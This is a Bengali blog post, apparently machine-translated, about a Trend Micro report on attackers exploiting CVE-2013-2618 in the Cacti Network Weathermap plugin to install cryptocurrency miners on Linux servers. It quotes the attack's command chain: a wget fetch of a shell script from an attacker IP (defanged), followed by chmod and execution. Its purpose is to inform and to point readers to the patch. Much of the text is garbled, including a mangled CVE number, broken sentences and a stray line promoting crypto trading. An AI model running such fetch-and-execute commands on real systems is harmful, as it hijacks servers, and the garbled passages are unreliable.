5-বছরের লিনাক্স ত্রুটি আক্রমণকারীদের ক্রিপ্টোকারেন্সি খনির অনুমতি দেয়

এই থেকে ক্রিপ্টোকারেন্সি খনি দূরবর্তী কম্পিউটার ব্যবহারের সাথে অনুমোদন ছাড়াই এর মালিকদের একটি ট্রেন্ড হয়ে উঠছে। এই ধরণের পরিস্থিতি সম্পর্কে আমি ইতিমধ্যে এখানে কয়েকবার ব্লগে এই বিষয়ে কথা বলেছি।

এবং এটি হ'ল এই মুহূর্ত থেকে ক্রিপ্টোকারেন্সিগুলি পুরোপুরি নিয়ন্ত্রণের বাইরে চলে গেছে বেশ যথেষ্ট জায়গা এবং মান নিয়েছে, সুরক্ষা লঙ্ঘনকারী কম্পিউটারগুলিতে অ্যাক্সেসের জন্য পর্যাপ্ত জ্ঞানযুক্ত লোকেরা আর্থিক সুবিধা পেতে গুরুত্বপূর্ণ তথ্য বা ব্যাংক অ্যাকাউন্টগুলির সন্ধানে সময় নষ্ট করে ফেলেছে।

এটি করার পরিবর্তে, তারা সবচেয়ে সহজ কাজটি করার বিকল্প বেছে নেয়: এই দলগুলির নিয়ন্ত্রণ গ্রহণ করুন এবং একটি খনির নেটওয়ার্কে তাদের একত্রিত করুন এবং অন্যান্য কাজের জন্য যা তারা সাধারণত বোটনেটের সাহায্যে করেন।

এইভাবে সাধারণত আপনাকে নতুন করে ভাড়া দেওয়া আরও বেশি হয়, তারা কেবল এটির ফলে তৈরি হওয়া তাত্ক্ষণিক অর্থের দিকে মনোনিবেশ করছে।

বাজারের প্রবণতাগুলির স্মার্ট বুদ্ধি এবং ক্রিপ্টো ট্রেডিংয়ের সঠিক জ্ঞানের সাথে, কেউ দুর্দান্ত সুবিধা অর্জন করতে পারে।

লিনাক্স আসলেই কি নিরাপদ ব্যবস্থা?

আমাদের অনেকের ধারণা, লিনাক্স একটি প্রায় নিখুঁত সুরক্ষিত অপারেটিং সিস্টেম, বাস্তবতা হ'ল এর এখনও কিছু ত্রুটি রয়েছে।

ভাল আছেকিছু দিন ট্রেন্ডমাইক্রো একটি অনুসন্ধান করেছে, যা প্রকাশিত একটি নতুন লিনাক্স সিস্টেমে ত্রুটি যা হ্যাকারগুলিকে মাইনিং ক্রিপ্টোকারেন্সির সুবিধা দেয় লিনাক্স সার্ভার এবং মেশিন ব্যবহার করে।

আপনার ব্লগের মাধ্যমে একটি বিবৃতিতে তারা নিম্নলিখিত মন্তব্য:

ঘটনার প্রতিক্রিয়া সম্পর্কিত আমাদের পর্যবেক্ষণের মাধ্যমে আমরা অনুপ্রবেশের প্রচেষ্টা পর্যবেক্ষণ করেছি যার সূচকগুলি আমরা জেনকিনসমিনার ম্যালওয়ার ব্যবহার করে এমন একটি পূর্ববর্তী ক্রিপ্টোকারেন্সি খনির প্রচারণার সাথে সম্পর্ক রাখতে সক্ষম হয়েছি।

পার্থক্য: এই প্রচারটি লিনাক্স সার্ভারগুলিকে লক্ষ্য করে। এটি পুরানো সুরক্ষার ত্রুটিটি ব্যবহার করে, যার প্যাচটি প্রায় পাঁচ বছর ধরে উপলব্ধ।

আপনার বিশ্লেষণের মাধ্যমে এই প্রকাশে In ক্ষতিগ্রস্থ সাইটগুলি সনাক্ত করতে পরিচালিত এই ব্যর্থতার জন্য এটি মূলত জাপান, তাইওয়ান, চীন, মার্কিন যুক্তরাষ্ট্র এবং ভারতকে প্রভাবিত করে।

আক্রমণ বিশ্লেষণ

বিশ্লেষণের মাধ্যমে ট্রেন্ড মাইক্রো স্মার্ট প্রোটেকশন নেটওয়ার্ক দ্বারা আক্রমণকারীরা কীভাবে এই ত্রুটিটি কাজে লাগায় সে সম্পর্কে কিছু বিশদ:

এই প্রচারের অপারেটররা সিভিই-২০১৩-২ explo১৮, ক্যামাপি নেটওয়ার্ক ওয়েদারম্যাপ প্লাগইনের একটি নির্ধারিত দুর্বলতা ব্যবহার করে যা সিস্টেম প্রশাসকরা নেটওয়ার্ক ক্রিয়াকলাপটি কল্পনা করতে ব্যবহার করে।

তারা কেন পুরনো সুরক্ষা ত্রুটিটি কাজে লাগাচ্ছে: নেটওয়ার্ক ওয়েদারম্যাপে জুনে ২০১৪ সাল পর্যন্ত দু'টি প্রকাশ্যে দুর্বলতা প্রকাশিত হয়েছে।

এই আক্রমণকারীরা কেবল কোনও সুরক্ষা ত্রুটি নয়, যার জন্য কোনও শোষণ উপলভ্য রয়েছে সেগুলিই গ্রহণ করতে পারে তবে ওপেন সোর্স সরঞ্জামটি ব্যবহার করে সংস্থাগুলিতে যে প্যাচ বিলম্ব হয় তাও গ্রহণ করতে পারে।

মূলত আক্রমণটি একটি এক্সএসএস আক্রমণের মাধ্যমে:

অস্পষ্ট অংশটি হ'ল আক্রমণ লক্ষ্য, একটি পোর্ট সহ একটি ওয়েব সার্ভার।

ফাইলটি /plugins/weathermap/configs/conn.php ক্রমাগত এক্সএসএস আক্রমণ থেকে প্রাপ্ত ফাইলটি / প্লাগইনস / ওয়েদারম্যাপ / পিএইচপি .

ছাড়াও conn.php প্রাথমিকভাবে, আমরা দেখতে পাই একটি অনুরূপ HTTP অনুরোধ 'নামক পৃষ্ঠায় প্রয়োগ করা হয়েছে cools.php '.

ক্রিপ্টোকারেন্সি খনির প্রোগ্রাম দুর্বলতার মাধ্যমে বিতরণ করা হয় পিএইচপি আবহাওয়ার মানচিত্র থেকে লক্ষ্যগুলি যেগুলি লিনাক্স সার্ভার

চিত্রটিতে আপনি কীভাবে আক্রমণটি উত্পন্ন হয় তা দেখতে পাবেন এবং এটি নীচে বর্ণিত হয়েছে:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

এটি যা করে তা হ'ল উইজেটযুক্ত একটি ফাইল ডাউনলোড করার ইঙ্গিতটি প্রেরণ যা একটি ইউটিলিটি যা প্রায় সমস্ত লিনাক্স ডিস্ট্রিবিউশন ডিফল্টরূপে ইনস্টল করা আছে

chmod 775 watchd0g.sh

ফাইল এক্সিকিউটেবল করে তোলে

./watchd0g.sh

এটি শেষ পর্যন্ত যা করে তা হ'ল সার্ভারে চালিত হওয়ার জন্য ফাইলটি।

সৌভাগ্যবসত, ইতিমধ্যে একটি প্যাচ আছে ( জন্য CVE-2013-2618 ) ব্যর্থতার জন্য উপলব্ধ এবং আপনি এটি ডাউনলোড করতে পারেন থেকে এই লিঙ্কটি

Si আপনি এটি সম্পর্কে আরও জানতে চান এই ব্যর্থতার আপনি এই লিঙ্কটি দেখতে পারেন।

উৎস: ক্রিপ্টোকারেন্সি মাইনার পিএইচপি ওয়েদারম্যাপ ভীনরেবিলিটির মাধ্যমে বিতরণ করা হয়েছে, লিনাক্স সার্ভারকে লক্ষ্য করে